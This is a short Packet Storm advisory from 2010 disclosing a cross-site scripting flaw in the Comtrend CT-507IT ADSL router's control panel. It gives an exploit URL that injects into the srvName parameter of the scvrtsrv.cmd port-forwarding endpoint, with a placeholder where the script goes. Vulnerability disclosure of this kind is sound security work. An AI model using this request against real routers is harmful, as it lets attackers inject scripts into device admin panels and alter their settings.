Comtrend ADSL Router Cross Site Scripting

2010-01-24T00:00:00
ID PACKETSTORM:85575
Type packetstorm
Reporter Yoyahack
Modified 2010-01-24T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: XSS in cpanel of Comtrend ADSL Router  
# Date: 23-1-2010  
# Author: Yoyahack  
# Software: Comtrend  
# Version: CT-507IT  
  
  
/*  
XSS in the control panel Comtrend ADSL Router  
*/  
/*  
Autor: Yoyahack  
Site: undersecurity.net<http://undersecurity.net>  
*/  
Exploit:  
  
http://Serve/scvrtsrv.cmd?action=add&srvName=XSS_HERE&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd=1,  
  
  
  
  
`